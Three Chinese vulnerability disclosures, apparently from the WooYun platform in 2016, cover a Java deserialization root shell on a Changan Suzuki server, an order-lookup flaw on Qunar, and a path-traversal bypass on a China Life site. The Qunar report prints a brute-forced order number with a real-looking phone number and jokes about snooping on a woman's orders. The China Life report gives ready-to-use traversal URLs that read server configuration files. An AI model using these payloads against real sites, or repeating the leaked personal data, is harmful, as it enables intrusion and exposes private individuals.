漏洞详情披露状态： 2016-05-08： 细节已通知厂商并且等待厂商处理中2016-05-08： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-13： 厂商已经主动忽略漏洞，细节向公众公开简要描述：rt详细说明： code 区域csc.changansuzuki.comjava反序列root权限拿个shell连数据库看一下1000W数据 漏洞证明：以上修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-13 09:50厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-06-18： 细节已通知厂商并且等待厂商处理中2016-06-18： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-20： 厂商已经主动忽略漏洞，细节向公众公开简要描述：去哪儿订单任意查询http://touch.qunar.com/手机登陆端于是就借了同事去哪儿账号登陆查看订单详细说明：http://touch.qunar.com/手机登陆端于是就借了同事去哪儿账号登陆查看订单1/flightOrderDetail.jsp?orderNo=xxxxxxxx&mobile=1860xxxxxx&sn=9FC5A13F13384B98EBE251472B1F8411&r=1&bd_source=3w_flight_sms&bd_from_id=wise&bd_ref_id=light_null&bd_channel_id=light_null&bd_sub_page=h5_mobile&bd_source_light=2264015orderno=订单号moble=就是手机好了其他参数都是 null=空意思就是说只要有了这两件东西 岂不就是随变查看女神在去哪儿的秘密呢吗抓包爆破扫了半天就出来一个lxh130430100540515 18611932216漏洞证明：  修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-20 10:11厂商回复：感谢白帽子同学关注去哪儿网安全，此问题之前有帽子已经提交到QSRC，而且已经修复；忽略处理。最新状态：暂无

漏洞详情披露状态： 2016-06-01： 细节已通知厂商并且等待厂商处理中2016-06-01： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-06-07： 厂商已经主动忽略漏洞，细节向公众公开简要描述：绕过限制下载任意文件详细说明：问题出在此处http://www.e-chinalife.com/product/benefitshow/indexlis.jsp?RiskCode=415构造code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\downloadToHTML.jsp&titleDoc=1 漏洞证明： code 区域if (fileName.indexOf("../")!=-1) { %> <html><body> 访问地址非法！！ </body> </html>仅当路径中出现../的时候提示访问地址非法，所以可以用\来绕过code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\/WEB-INF\/web.xml&titleDoc=1你懂的code 区域http://www.e-chinalife.com/product/benefitshow/suggest/downloadToHTML.jsp?Path=/..\/sys\/sysLog.jsp&titleDoc=1 修复方案：过滤版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-06-07 09:50厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无